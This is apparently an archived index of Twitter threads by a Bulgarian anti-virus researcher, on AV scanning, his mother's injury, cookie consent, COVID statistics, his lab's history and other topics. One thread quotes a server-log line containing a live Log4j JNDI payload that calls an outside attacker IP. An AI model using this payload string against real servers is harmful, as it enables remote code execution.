Vess
Anti-virus, malware and infosec expert, crypto amateur, privacy advocate and general annoyance. PGP keyID: 0x365697c632dd98d9
May 16, 2023 30 tweets 4 min read
So, Microsoft's scanner started detecting malware in password-protected ZIP archives and people are losing their shit because they have no goddamn clue how anti-virus programs work.

arstechnica.com/information-te…

Strap in, kids, because I'm in a lecturing mood. Thread: For some unfathomable reason, people seem to think that scanning works like this:

f = OpenFile(fname)
buffer = ReadFile(f)
for str, name in scan_strings do
    if str in buffer then
        report_malware(name)
        break
Feb 19, 2023 10 tweets 2 min read
Apparently, the Bulgarian "crypto queen", Ruja Ilieva, famous for the OneCoin scam, who has disappeared and is on the FBI most wanted list, was killed in November 2018 by order of a Bulgarian narco boss. The killer, also a Bulgarian, is presently in a Dutch prison for some drug-dealing crime.

She was killed on a yacht in the Ionian Sea, her body was cut into pieces and thrown overboard.
Oct 6, 2022 13 tweets 2 min read
Update. My mother's knee is swollen but not enough for them to have to drain it. So, she spends her time in bed with a large bag of ice on her knee.

She's the oldest patient in the room. Also the sanest one. The other two grannies, despite being younger than her, are senile. One of them talks to herself the whole night. The other, who has been operated on, was trying to rip off her bandages, so they had to tie her to the bed.
Oct 5, 2022 34 tweets 5 min read
My mother fell and busted her knee... :-(

God, I live in such a shithole of a country.

A thread... She fell because the plates of the sidewalk were dislodged and she stepped between them.

In a civilized country that's a license to sue the city for damages because they didn't maintain the sidewalk.

In my country it's a license to be laughed at.
Sep 1, 2022 6 tweets 1 min read
It's hard to argue with people who are idiots.

It's even harder to argue with computers that are idiots.

But it is the hardest to argue with people who are idiots and are armed with computers that are idiots. Case in point. A former colleague of mine submitted a paper for a conference. The conference organizers used one of those idiotic plagiarism-checking tools. It came with the results that 31% of my colleague's paper was plagiarized.

The plagiarized parts were marked. Let's see:
Aug 29, 2022 11 tweets 2 min read
My bank just served me a cookie consent pop up. Being of the curious sort, I decided to delve into the options and see what exactly I am agreeing to.

There were several categories of cookies: strictly necessary, statistical, marketing. By default, only the cookies in the "strictly necessary" category are marked as the ones the user is agreeing to (although there is a big fat "accept all" button that most people would click). So far, so good.

OK, let's see what's "strictly necessary" to my bank, shall we?
May 19, 2022 12 tweets 2 min read
(Apologies for locking this thread but I'm really not in the mood of answering anyone's comments on this subject.)

In 1990, I established the Laboratory of Computer Virology at the Bulgarian Academy of Sciences. Computer viruses were very prevalent in my country at the time, I was single-handedly developing anti-virus programs for them and cleaning people's computers, so I thought it a good idea for an institution that would do this more professionally.
Mar 25, 2022 16 tweets 3 min read
OMG, Win10 is such a tremendous pile of crap!

It's as if someone who didn't have a clue how to design an ergonomic tablet user interface, has designed a crappy tablet user interface and put it on a goddamn desktop operating system. Did Microsoft fire all their user interface designers before starting to work on Windows 10?
Dec 11, 2021 4 tweets 1 min read
Scanning my web server logs for Log4j exploitation attempts...

Yesterday, a Russian IP was doing plain vanilla exploitation:

45.155.205.233 - - [10/Dec/2021:16:11:14 +0200] "GET / HTTP/1.1" 403 135 "-" "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/STUFF" A few hours later the same IP did the same kind of exploitation with a minor variation - it put the IP of the attacked machine in the Referer header. (Exploitation still via User-Agent).
Aug 2, 2021 10 tweets 2 min read
@matthew_d_green, I just discovered that Twitter-style trolling exists in academia. Well, in Bulgarian academia, at least, but I somehow doubt that it's limited to it. @matthew_d_green Perhaps you're familiar with the "science" of "scientific metrics" - an attempt to measure the usefulness of the work done by scientists.

The original idea was to count how many papers the members of a scientific outfit publish in a year. Of course, that system was gamed.
Dec 29, 2020 13 tweets 2 min read
I kinda disagree with this.

Not disagree as in "He's wrong, this is complete bollocks" but as in "He's right about some things, wrong about others, missing yet others and the things are much more nuanced and discretion must be applied". I was asked to elaborate, so here it is.

The whole article is based on the premise "ransomware contains data that's private for you, once you upload it, everyone can get it from VirusTotal". This is wrong and incomplete in several ways.
Dec 15, 2020 4 tweets 1 min read
The official total number of COVID-19 cases in Bulgaria is now 181,544 (+2,095), 5,838 dead (+150), 85,578 recovered (+1,858).

Of the 90,128 (+87) still infected, 7,045 are hospitalized (-199), 580 of them are in ICUs (-10).

7,919 of all infected are medical personnel (+66). Sofia is again hit the hardest - 312 of the new cases are here.

Positivity rate of the tests for the past 24 hours is 39.5%.

Only 33% of the medical personnel have requested to be vaccinated.
Dec 14, 2020 5 tweets 1 min read
The official total number of COVID-19 cases in Bulgaria is now 179,449 (+497), 5,688 dead (+62), 83,720 recovered (+1,963).

Of the 90,041 (-1,528) still infected, 7,244 are hospitalized (+20), 590 of them are in ICUs (-5).

7,853 of all infected are medical personnel (+38). Sofia is again hit the hardest - 131 of the new cases are here.

Positivity rate of the tests for the past 24 hours is 30.4%.

On average, 1 of every 78 people in the country is currently infected.
Aug 6, 2020 7 tweets 2 min read
My mom: I got the monthly bill from the mobile provider. But I can't open it.

Me: Why not?

Mom: It's in a ZIP file protected with a password.

Me *confidently*: Oh, this is a common trick. Scammers send malware like this to bypass e-mail gateway scanners.

Mom: Take a look. So, I do. E-mail headers look perfectly OK. It really does seem to come from the mobile provider. Is this some trick I don't know?

The message addresses me correctly by name. OK, maybe they got it from somewhere.

Message says ZIP's encrypted with a password to protect data.
Jul 19, 2020 12 tweets 2 min read
So, if I can buy cucumbers on-line, why can't I vote on-line?

It's a good question that deserves a good answer.

Thread... To begin with, you are free to order as many cucumbers and as often as you want. As opposed to that, you're allowed to vote only once, otherwise it's voting fraud. So, unlike a cucumber-ordering system, an on-line voting system must ensure the uniqueness of your vote.
Jan 20, 2020 27 tweets 5 min read
Perhaps to honor Acad. Sendov's memory, I should tell you the story about how our Lab was created.

So, gather 'round the fire, kids, etc., etc.

It's story time... I started working with computer viruses in early 1988. I analyzed every new virus that appeared in our country and wrote a program against it. Yes, a separate program for each different virus.
Jan 12, 2020 72 tweets 11 min read
OK, folks, I promised to update you on the situation of the guys who get hit with something (MyKings, Sodinokibi, etc.) every
couple of months.

So, gather 'round the fire, kids, it's story time.

The story has a happy ending this time but is not without some funny moments... We had an agreement with their boss to drive with his car to my home address at 10:30 on Saturday and to drive me to their premises, because it's quite far away (one-hour commute for me) and I don't have a car.
Jan 10, 2020 13 tweets 2 min read
There is some weird shit going on with our Windows licensing. This isn't going to be a rant against Microsoft (besides the occasional jab); mostly against the idiocy of Bulgarian government bureaucracies...

Thread... The outfit I work for (the National Laboratory of Computer Virology) is part of the Bulgarian Academy of Sciences. The latter is a government research institution, on government budget. The entity that decides how the budget is spent is the Ministry of Education.
Nov 13, 2019 50 tweets 7 min read
Attending the third and last day of the ethics conference.

Before we begin I stop by one of the organizers' table and half-jokingly note that I hope there will be no racist remarks today. "What racist remarks", asks the organizer. Oh, c'mon, you were sitting on the same row as me yesterday during THAT lecture.

OK, let's be precise. "Yesterday morning, during the first lecture", specify I.
Sep 16, 2019 15 tweets 2 min read
I've been researching the SimJack issue and the more I am, the more something smells fishy about it... Yes, there has been a wide coverage of it. But every single article stems from a single source - the AdaptiveMobile report. OK, so they were the ones to discover it, so maybe that's fair. But no independent confirmations? That's odd...
Aug 1, 2019 22 tweets 6 min read
Oh, my...

The AG office has released proofs of culpability of TAD Group and Kristian Boykov in the hack of the Bulgarian National Revenue Agency.

Things don't look good for the defendant... The stuff I saw in the media is mostly images, so Google Translate won't work; it will take me some time to compose the gist of it for Twitter. Hang on.

BTW, I couldn't find the corresponding info on the site of the AG office.